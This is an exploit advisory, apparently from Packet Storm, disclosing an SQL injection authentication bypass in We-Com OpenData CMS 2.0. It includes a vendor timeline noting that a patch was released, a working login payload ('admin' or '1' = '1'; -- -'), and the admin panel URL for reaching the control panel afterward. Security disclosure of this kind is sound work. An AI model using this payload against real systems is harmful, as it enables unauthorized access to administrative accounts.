We-Com OpenData CMS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
50a0db0e24a84db773d1cd4173faee5e2689f509de4a570588c6bf202fad4e60# Exploit Title: We-com OpenData CMS 2.0 Authentication Bypass / SQL Injection
# Google Dork:N/A
# Date: 2020-04-17
# Exploit Author: @ThelastVvV
# Vendor Homepage: https://www.we-com.it/
# Version: 2.0
# Tested on: 5.5.0-kali1-amd64
---------------------------------------------------------
Vendor contact timeline:
2020-05-05: Contacting vendor through info@we-com.it
2020-05-26: A Patch is published in the version
2020-06-01: Release of security advisory
Authentication Bypass / SQL Injection in the opendata 2.0 CMS
PoC:
Payload(s)
USERNAME: admin' or '1' = '1'; -- -
PASSWORD: vvv
the SQL injection attack has resulted in a bypass of the login,to confirm you will get a reponse in header of the page with "okokokokokokokokokokokokokok"
But will not redirect you to the control panel so you wil need to do it manual
https://www.site.gov.it/admin/?mod=mod_admin
and we are now authenticated as "adminstrator".
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed